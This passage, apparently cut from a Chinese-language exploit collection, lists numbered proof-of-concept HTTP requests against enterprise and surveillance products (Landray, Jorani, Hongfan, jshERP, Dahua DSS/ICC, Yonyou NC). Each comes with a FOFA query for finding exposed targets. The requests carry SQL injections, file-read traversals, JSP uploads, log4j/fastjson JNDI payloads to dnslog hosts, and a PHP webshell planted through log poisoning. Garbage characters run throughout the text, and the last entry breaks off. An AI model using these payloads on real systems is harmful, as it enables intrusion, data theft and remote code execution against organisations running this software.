FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台") `- }1 H( a7 k+ i6 Y) T [
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1) p, U4 ]( s+ V
Host: 127.0.0.1/ _, g6 b" R" i3 m
Pragma: no-cache+ N, g: `$ ~ r- l% Z, [
Cache-Control: no-cache
! ~0 E( H/ C" b. ]! gUpgrade-Insecure-Requests: 18 I6 P8 m) X. M0 F, W% R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.367 K4 T5 {* D' W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' ~; @1 v1 q; UAccept-Encoding: gzip, deflate! |$ p2 f) F, P/ }7 f3 x2 u
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
2 s' K$ U9 `+ Y3 |: z/ a+ eConnection: close
& t* |) a- f3 |( j( Q6 R7 D! A7 o7 ^
) d) V- _2 K5 l& Q( m* U
9 ]( y: N% Q4 r12. Jorani < 1.0.2 远程命令执行
5 y1 Q4 u5 G" HFOFA:title="Jorani"4 O3 S1 y5 |1 S+ A- M$ {8 V
第一步先拿到cookie
! A4 i* |5 i! gGET /session/login HTTP/1.1
/ i3 e* ]$ T, W& pHost: 192.168.190.308 Y) S4 }; i5 A7 m# k" k
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
2 Z' N6 i, L0 O" f1 ]Connection: close% C' h( F; Z! z7 R2 r$ B7 m) O* a
Accept-Encoding: gzip0 ~+ e4 L% v0 j) F4 V; i
' b8 X# N7 U, I7 F3 f6 |
, l2 m) d# ?0 r/ E" f; G7 L
响应中csrf_cookie_jorani用于后续请求
; e- D. x3 m6 IHTTP/1.1 200 OK3 v2 n0 r y# N+ L* I
Connection: close. M8 O7 _+ J* z
Cache-Control: no-store, no-cache, must-revalidate
2 p; g, ~+ M8 {8 M, ~8 t6 MContent-Type: text/html; charset=UTF-86 y; O" t# z; `# P" a
Date: Tue, 24 Oct 2023 09:34:28 GMT
. W; G) `* H5 AExpires: Thu, 19 Nov 1981 08:52:00 GMT
. ?% H, ?( J# }( qLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
0 {3 ^$ l% N) \' Q- h* W! Q" i3 QPragma: no-cache" ], j+ h( U. O5 x# o# E, T
Server: Apache/2.4.54 (Debian)7 H0 l9 J% t Y# \- X0 x
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
8 U u6 ~' l& ]9 y3 X* XSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
) m& r+ i% _1 [* B; ~; `7 ~- w9 CVary: Accept-Encoding
- `& u" C1 ]& Z+ E$ Y* V- S$ U Y! x! A
/ u. C+ ]- q, ~6 f& s. O( c
POST请求,执行函数并进行base64编码) o& t( m$ q5 O5 m6 R/ H
POST /session/login HTTP/1.1: B% Z% U! ?9 L0 A' ]7 ?
Host: 192.168.190.30
. o5 {( V Z" D2 a/ ]0 U8 G0 h2 wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
( d9 e) e3 Z7 K9 N( o8 SConnection: close
' l/ W! G& }8 J( Y# HContent-Length: 252
F- k3 \$ V9 x- }# qContent-Type: application/x-www-form-urlencoded
h$ J) }" X5 M' k4 B3 uCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r! n3 ?5 ?. M/ Q7 t
Accept-Encoding: gzip o1 i2 r& Y v- j
8 M0 D8 O7 y% r) P& A+ H- v9 L
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
/ q. q% O# w' W+ D0 C3 C8 \' {2 S# s& f1 p( j
8 E5 ]+ C9 {; ~- f+ b; U. C& N- i
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串8 V! X" {5 |, h# h }1 J! P8 D) W \
GET /pages/view/log-2023-10-24 HTTP/1.1
$ e) w6 A3 g/ v3 }! }# I9 S! z! XHost: 192.168.190.30
1 Q/ G7 C: B# @# {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.368 s% v" d: q1 E2 `& z# h
Connection: close5 m; E7 U" _( A2 n, r, [- v0 K
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r, y9 n7 I) a/ j# X, N
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
& l9 M; O! M3 @& PX-REQUESTED-WITH: XMLHttpRequest
1 ~8 z$ `, C+ T& @/ B+ oAccept-Encoding: gzip7 Y( m) E9 c" A$ O- ]& L8 c4 K. D: F% M
0 M7 a3 x: \1 c: J+ f- a
( q9 g' o' {) A13. 红帆iOffice ioFileDown任意文件读取
& p) @( E8 Z$ u! V8 p0 A( C6 pFOFA:app="红帆-ioffice"4 q/ O! ~ V$ P1 {
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
1 Y# T5 H* p2 W. s |: O" U" GHost: x.x.x.x) l2 L1 a; W! C9 ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.363 F& s6 Q# H' X7 J
Connection: close
6 a7 W1 n* N1 ?/ `' NAccept: */*
7 w% I: e& F D; u) Z" HAccept-Encoding: gzip
0 [! p! k+ C2 p# ~% o/ u; q; V; _2 x U* i6 p
6 n5 _3 h" N6 |9 V
14. 华夏ERP(jshERP)敏感信息泄露
J& u$ l& A. W& n3 J$ b) aFOFA:body="jshERP-boot"
- w. X9 w' h) J2 e2 l泄露内容包括用户名密码% F7 w7 I8 l( k2 T6 R. w
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1! ?; j3 F/ f1 N, z4 i
Host: x.x.x.x
6 v' X% I. H) ^; a' _6 M; KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
8 ~7 k3 \6 g2 u$ X; r4 sConnection: close* [- l" l; l3 I* ~+ y
Accept: */*1 j2 |! y- L& l5 Z/ o
Accept-Language: en' g3 Z* V" S+ R
Accept-Encoding: gzip! l. L* O0 X: }9 G% c
+ L6 s5 T+ o7 a% E) k8 }# k. u9 t! w# H7 w( ^
15. 华夏ERP getAllList信息泄露) S, i4 w/ U- A: z# x# }
CVE-2024-04908 W: J# V) ?. t' C& Y6 F* Q; T
FOFA:body="jshERP-boot"
8 p7 N, m3 P, I4 C `6 z0 ]泄露内容包括用户名密码, @0 r) r/ x! |* d
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.11 G8 w# U: |+ ]+ p, a2 P0 \
Host: 192.168.40.130:100 J% r1 S3 W1 N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
2 R& b$ i: L. r) i- E# [Connection: close. I5 i0 U6 a% |; _) n
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
+ J e* j- d- `3 S/ o) R/ @+ {Accept-Language: en$ P1 b5 }( c* S3 z" C
sec-ch-ua-platform: Windows+ `5 A7 z7 A/ E$ V6 |
Accept-Encoding: gzip
( H o% n! g+ i4 R
# [ ?/ I ^; z; d2 r7 ~2 P9 S8 u, G. r
16. 红帆HFOffice医微云SQL注入
1 x0 V3 C. R# V( X u( U- `0 \FOFA:title="HFOffice" `, U3 `+ o/ Z( u* \
poc中调用函数计算1234的md5值% D" C9 J! ?; Q) f
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
6 a: E0 E/ F( |" u0 Y+ ^3 c: D4 ZHost: x.x.x.x
9 U8 J" `0 g) R* M5 ~User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
* [5 ]/ u, G- Y/ v5 XConnection: close
$ k. `9 g5 I( _% K; EAccept: */*5 t! ~& }$ z6 V- }/ Z7 W
Accept-Language: en
' D: z+ ?3 H! WAccept-Encoding: gzip
; n$ l! u8 H6 ~9 E; d* A" m" e, |
3 _" P, \" ^9 k
6 X7 Y b: t6 B% ?2 |% S17. 大华 DSS itcBulletin SQL 注入& V# C, m* y+ v) X* P
FOFA:app="dahua-DSS"
, R& J) f; Z2 P* W+ h' jPOST /portal/services/itcBulletin?wsdl HTTP/1.1
+ Z. J/ n5 l' n' V/ K5 CHost: x.x.x.x
6 ^$ x! m( F* a' }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 x/ O! n1 O2 h) Q/ yConnection: close
" l5 L6 _, z6 o) s9 u- vContent-Length: 345
/ H0 H0 ]5 ]4 ~6 h6 g2 e9 FAccept-Encoding: gzip! y: s! k: d3 h& f5 J5 \( A
! f5 ^- o3 s. t$ P( {& A<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>. v/ p" Z0 J& Z, ~$ x4 p& A& s! ]
<s11:Body>" c8 O+ l6 i; e8 `
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
# w/ L1 `1 f0 Q0 f9 q' C/ b <netMarkings>
. |7 {) G: [/ q5 o. {; V, ]" Y (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
9 Y3 c$ o9 E0 @' U7 A2 Y' q </netMarkings>
) I* `! ^# |$ g; V; ?9 m </ns1:deleteBulletin>
; A: S% l7 u z" `2 \' q </s11:Body>
2 [! G3 u( k' H5 r5 t. u# q</s11:Envelope>
3 W& \2 B7 N! f- Y, B* E; \$ X& N$ c+ N! E
9 r* t- C5 |) @2 @
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
3 z/ E9 [$ O; R" bFOFA:app="dahua-DSS"3 A7 z& v; z- C' p
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
" I$ T0 g8 r5 q- j. s6 tHost: your-ip( }! q) ?( A, G% m, o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% [8 l" d& g/ Z
Accept-Encoding: gzip, deflate; H3 W" z6 ~/ d+ x5 m- i
Accept: */*
: z) f) A% M+ C: j8 Z% HConnection: keep-alive9 ^( [0 o G' \4 c% S# D- o
: J! Y2 Y+ n- b1 r: Q9 _1 J2 P! |! V7 I5 O) V6 {' M0 ?+ `
2 h* M! t8 k* s& ^7 |7 R$ o& z
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
4 W# R# A* L2 o/ \3 q# O" n8 w6 @4 ZFOFA:app="dahua-DSS") I$ R6 A; s; w2 j
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
* x; Q+ }4 k% E3 Y& t, nHost:& I+ i+ f9 j2 o# j1 A
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
( O+ \5 X0 _% W `9 s1 d# CAccept-Encoding: gzip, deflate( \" i5 z& O) D! l, G
Accept: */*
( x! O# E% ]" A& A+ WConnection: keep-alive2 N) U; P0 y' [3 j G' p; F; q
- h& C( Z# ~! J7 }
! ?$ u. R( y; m3 I: q9 [! h
20. 大华ICC智能物联综合管理平台任意文件读取5 X/ j* e T1 h6 t
FOFA:body="*客户端会小于800*"3 l: g# v. F8 u _0 ^' i4 i* t/ ?
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1 {% `: \6 v2 ?. C8 c. L
Host: x.x.x.x( b( n5 n* ~7 @
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& y- m7 n- y! [ JConnection: close
5 y% h/ W* ?5 }- m! bAccept: */*) `, |% s. h3 ]$ V' v# n
Accept-Language: en0 g4 q- {1 @# c l" v2 G
Accept-Encoding: gzip
9 P4 ^, A2 k5 h" I' A, |9 T: k; Q. j1 n0 W3 X; ^% }+ ?
) Q! }" o# u0 p' V
21. 大华ICC智能物联综合管理平台random远程代码执行
' m: j" n$ G8 I5 _% oFOFA:icon_hash="-1935899595"
, C, O4 C, i, W) G; qPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
$ E7 `7 ~( z& E% G; ]6 u1 g" E% uHost: x.x.x.x; y5 r: R) W( H( }+ i. _+ X1 N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 D: \1 H- f9 R: h: @
Content-Length: 161" g! T; t' t+ i- U+ o
Accept-Encoding: gzip1 \9 d- L/ _6 h
Connection: close
$ N f8 N" o4 ~5 g$ [, {Content-Type: application/json;charset=utf-8" o5 X/ K7 R0 x7 q8 l& y
% V5 N/ a$ M6 a+ ^2 D{" g4 T9 M' S& W4 g, j
"a":{
5 y' d* |3 }- v0 z! S! e "@type":"com.alibaba.fastjson.JSONObject",- D: A- d7 `9 Y. O6 k$ F
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
9 S) N. ~7 V) z8 {! [& ~+ U) @ }""* L0 I6 e' z; W. _/ c R
}0 n" t6 u1 L9 e( i! b
$ O+ k8 q* u( g9 m- q
7 a' K7 X5 ]& g) y3 Y
22. 大华ICC智能物联综合管理平台 log4j远程代码执行3 o; U$ J) b% ~! K# Z. D8 i. {* r
FOFA:icon_hash="-1935899595"
2 k, i; T x4 `; W; lPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
6 F" G/ F. g) Y UHost: your-ip8 B# x( `! f4 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
) o" ]: X! ^+ A# ~, ?5 l3 YContent-Type: application/json;charset=utf-8
3 F1 u/ r' v: }- D& O" q
o. {8 {9 C H{
! I7 [0 w. {. h d) I3 N4 Q"loginName":"${jndi:ldap://dnslog}"
7 O. M8 p4 v, Z1 l' D}
& D: u! I R3 }: h( i, Y9 y& ^" k9 G; e3 l" f) s" a
7 X* V$ |$ o$ B3 m& {. b# f5 R2 [6 v* a) {6 R; n3 \
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
2 r3 x1 N2 v I/ z! M* ]3 PFOFA:icon_hash="-1935899595"
4 E9 G& j- u3 n. L4 \, e3 `POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
. f: V7 R9 M. N6 @9 x6 EHost: your-ip. z, t w7 K& d) D) J+ f$ s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" B8 b* `/ }$ {7 t/ [Content-Type: application/json;charset=utf-8/ [& ^! \6 i, H" m" X9 Z
Accept-Encoding: gzip" ~# Z5 Y4 P: a& p0 Y3 B1 e
Connection: close+ X7 c$ n& S# {7 B$ y+ ~ A0 E& Y
5 F+ [3 |* [: Y9 ^( M{/ ]1 U1 g7 Q, y& G I
"a":{ ]/ o2 z0 x, U; ~$ v% w8 Z" M: ^* i& Y" i
"@type":"com.alibaba.fastjson.JSONObject",9 } s3 Z4 b) b( h7 J) }- k7 w
{"@type":"java.net.URL","val":"http://DNSLOG"}$ ~; N0 d7 a+ T& E. A1 ?9 i
}""
. }- _# |5 s5 a( E2 Q}( C7 |; ]2 s9 L& B) ~9 Q( M S
) x4 [ @; Q* [
7 ~% x. d. e3 i( g: I24. 用友NC 6.5 accept.jsp任意文件上传
9 B3 @6 X5 r& E: [FOFA:icon_hash="1085941792" y# K+ |. Q0 Q$ T7 S
POST /aim/equipmap/accept.jsp HTTP/1.1
) H7 j# ^; |0 @& B6 Y2 i* a5 FHost: x.x.x.x+ d% T9 d* Q* u/ ]5 D( S n
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
5 d& f( t! J! W+ R- NConnection: close k( t, J+ w. ]
Content-Length: 449
/ |: U8 g4 x! F1 c# z8 ~( K. FAccept: */*2 H' k' m9 c/ I. X
Accept-Encoding: gzip
8 M8 N- Y x/ L& Z, sContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
: T5 c E& S$ S
+ {8 n' p1 c! @6 n4 r-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc2 E' z( |3 [& T4 A7 ^( ~
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
& \6 A. A# \& _Content-Type: text/plain1 f9 l* z+ w. J1 n% d
3 q2 F9 E0 }# a* i+ N! [
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>& t7 c2 H9 o% o P
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc- D% V; f! S; y$ i; B* n
Content-Disposition: form-data; name="fname", d. U: l o/ U2 @
; d+ q5 [+ M; F5 V. B: n
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
( c8 s F+ s* `+ c8 R" v-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--& q0 g9 F7 }! \/ j# E2 d
( h2 J8 @5 R0 t
8 m6 M* ^- n2 f8 G/ Z( W
25. 用友NC registerServlet JNDI 远程代码执行9 t" U0 v6 ?2 r
FOFA:app="用友-UFIDA-NC") T$ m9 k' h" O2 r$ h
POST /portal/registerServlet HTTP/1.19 c/ }( Q4 p( r! s5 r0 d! w8 Z
Host: your-ip8 M$ F) x% V* l5 i4 Z, G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.02 ^+ Z+ k/ @9 @/ M; n" s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
: M, }6 W/ S' v: e gAccept-Encoding: gzip, deflate
( K2 |# W2 H8 u. fAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
* ]0 d M7 \$ D) b" W) bContent-Type: application/x-www-form-urlencoded4 F& B) H l9 L2 K. {1 Y- b* d
" T. I& f; j4 @: t2 E( `8 Ftype=1&dsname=ldap://dnslog4 J/ j/ G& k% }1 {
+ S( J* V7 u) z- e$ r4 k2 j5 g" M
' W% s `: s3 _- @2 \( W26. 用友NC linkVoucher SQL注入
4 P3 X) A; i7 e$ V/ p+ v- ~FOFA:app="用友-UFIDA-NC". ?- L) `6 e! }
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
2 N4 ~, Z; q5 }. A& @, \* _Host: your-ip
9 K7 [: i3 \% v8 O1 H' @ fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- B8 o% L Z _2 x' _Content-Type: application/x-www-form-urlencoded
6 T1 e6 s" x; i; [: j, HAccept-Encoding: gzip, deflate1 B% \, D* `4 F$ Q* _% C1 h
Accept: */*
( @% B. ?- S/ R3 T! @8 xConnection: keep-alive
- v7 _0 L) w3 Y1 d: @! r7 O: y
' I. x! ~- ]! ]# O7 M* c& o; k
( M4 v: y- @& K2 J) b27. 用友 NC showcontent SQL注入* e4 @1 o$ N! q: ?
FOFA:icon_hash="1085941792"5 `# D) W2 L1 z2 p4 }
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
5 z ~9 m# h n @ F$ ?# T9 @Host: your-ip$ \7 H2 C: y) h, j8 O+ [. V5 v: e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 x/ ~( w" y! EAccept-Encoding: identity+ \6 `# Z9 A- r8 m$ b
Connection: close3 S* a# B9 g; a
Content-Type: text/xml; charset=utf-8/ D$ Q9 }" m( _# ^+ s3 O
5 S) ^$ b- ], ]
+ d8 c8 B0 b/ i2 f28. 用友NC grouptemplet 任意文件上传
" A7 R% O2 @# C; G t5 Z* h* pFOFA:icon_hash="1085941792"
9 p. C6 X; I a) Y# r: @' g4 fPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
, W$ x/ u: g: l1 |4 dHost: x.x.x.x
* ~0 q% I I2 S" @" rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.366 ^5 p6 E3 D5 P$ d" `# M+ @# e
Connection: close
/ x" {: n( g( }+ c k2 f8 r, F; d9 [Content-Length: 268
) G* Z+ _' R5 t4 L8 l7 AContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk. Z, d _! x V
Accept-Encoding: gzip
# ?! K+ T# J7 X+ @7 @. b% i$ F
2 [" s) n$ B" o% a5 o$ \/ }------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
) Q* i- r# d# SContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
/ P) A) ]" L2 a: RContent-Type: application/octet-stream3 C: m+ O- P) Q$ p8 }" c
* A8 ?+ G0 J. g( K: ?
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
! K7 ~0 Y, w4 O0 {8 T$ ~------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--0 j, U0 I! f* L
! W1 n0 C. `8 N3 h7 W1 O# Z* S
6 U3 W; q$ t- I3 V1 t. Z$ K/uapim/static/pages/nc/head.jsp
& j$ u8 Z5 Z" Y- S/ g: z1 o5 X( E1 ^7 h
29. 用友NC down/bill SQL注入
/ Q; w* @" n0 L9 l$ ~7 H7 RFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"/ Z: j$ [8 S" T
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1; m; @, s; _9 a7 A
Host: your-ip4 K8 o$ R- ?/ I' e" ?4 V" d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" U3 y# v6 @, q1 H
Content-Type: application/x-www-form-urlencoded
3 m9 V. w3 Q* u* K9 AAccept-Encoding: gzip, deflate$ I) r4 m1 w' E7 L; {" `
Accept: */*3 d5 I: _1 W: O5 w' N0 L7 ?. m
Connection: keep-alive, ~* L$ J/ S( k8 W" Z
# _/ Z4 D' c9 e3 b" Y' X* {0 O; I. M/ U
30. 用友NC importPml SQL注入
' Z5 E4 u. T5 U: A( A+ x- m4 iFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
# m' G& m9 [8 G( I* _POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1; i6 E3 `# x& z2 C0 j# o
Host: your-ip4 K# p9 V7 M$ d6 `# s
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
( @5 k/ D% g+ e! |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
! E k. j7 m+ M; L# \Connection: close7 k* Q/ |! Z; Q/ J" L1 q& F2 Y
. |: ~% d' K- {
------WebKitFormBoundaryH970hbttBhoCyj9V; [8 K$ m! [' ^* f; Y# e
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
( b- |3 T5 e- J/ o# x: _& m/ _8 XContent-Type: image/jpeg
* d8 u0 m9 O- Y' Z------WebKitFormBoundaryH970hbttBhoCyj9V--4 ]0 e" y6 t- ^' \3 |
2 }, f$ g, f4 s' Z' l; g5 t1 o$ p/ b5 H* b9 T
31. 用友NC runStateServlet SQL注入
' H0 K Y2 @$ Q0 e) bversion<=6.5
0 x$ m: x* H6 e# gFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
' M6 `4 _# `. O! e" ]& kGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1/ C# k) T+ c* K7 j4 {( g0 `
Host: host Q7 P% l$ ^1 S* M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36- T7 c$ M" A# L& y
Content-Type: application/x-www-form-urlencoded, I, k$ ]/ k! \5 W% w
/ g5 H M* S# F9 ]) i/ f6 E S
5 }, j4 ]9 {( R
32. 用友NC complainbilldetail SQL注入* N0 J! H/ K3 q0 A# o0 o1 p0 t* r
version= NC633、NC65
! X: S) r3 D0 L- xFOFA:app="用友-UFIDA-NC"
2 Q p' A7 V, r8 q& _" \6 v' uGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
, i C' d. j! C2 k! w$ b/ r3 |Host: your-ip
& F* g c6 t+ ]# @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ U5 v: N: j; O) _$ V5 X4 `( Y/ O
Content-Type: application/x-www-form-urlencoded
, ?2 ]3 }4 {: Q. V' `$ K; q# i: NAccept-Encoding: gzip, deflate
$ S/ m1 a. S( m9 G6 F7 p* x7 FAccept: */*; e0 M. |% h- e/ W5 R8 ]7 [
Connection: keep-alive
( v, C) _5 f' d# G* v5 Y2 h: H$ y8 P$ _* H( y
- H% p, z: M5 \2 E8 r, s- f
33. 用友NC downTax/download SQL注入
! T% V2 T3 @# h% y: Y# vversion:NC6.5FOFA:app="用友-UFIDA-NC"
9 w S- H- y5 l6 y& G; a6 B& IGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1$ h2 n7 S! u5 Q. b! \) h: K
Host: your-ip
9 U% O0 l) W, x* bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& G- r4 U8 l& d0 K
Content-Type: application/x-www-form-urlencoded) \. Z3 O: m w8 K) x( m. a
Accept-Encoding: gzip, deflate: q0 \3 R" V4 l2 a0 ~
Accept: */*5 y; _, e8 j! ]! W/ ]7 P
Connection: keep-alive
5 T6 U4 k: o z" i% P% C, `3 [6 ]" }$ L, Q' b
& ]7 `3 c9 W/ z* N; c34. 用友NC warningDetailInfo接口SQL注入
m; M) |* K* zFOFA:app="用友-UFIDA-NC"
7 ^9 @$ N6 c. i4 j/ t. w& w5 d, S, ^GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
# [: N* Z: x* {; u5 LHost: your-ip$ V; N) z u4 g; E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ n) C. K( |& h gContent-Type: application/x-www-form-urlencoded
/ ?& o0 ]1 ]: R; U% GAccept-Encoding: gzip, deflate
% @# c3 T, t! `4 cAccept: */*9 y, S3 C$ f3 B h* O
Connection: keep-alive
6 R; V# F; w3 ]6 I4 U# @8 H
) T) C7 Y) c: |8 q6 N4 p0 E9 h; K& u4 V! C
35. 用友NC-Cloud importhttpscer任意文件上传
\! ~8 X; v0 t. Q! K$ rFOFA:app="用友-NC-Cloud"
' Z# w" V& s! @0 Q! o9 W3 \POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
! h# g( Y) f6 C3 @Host: 203.25.218.166:8888
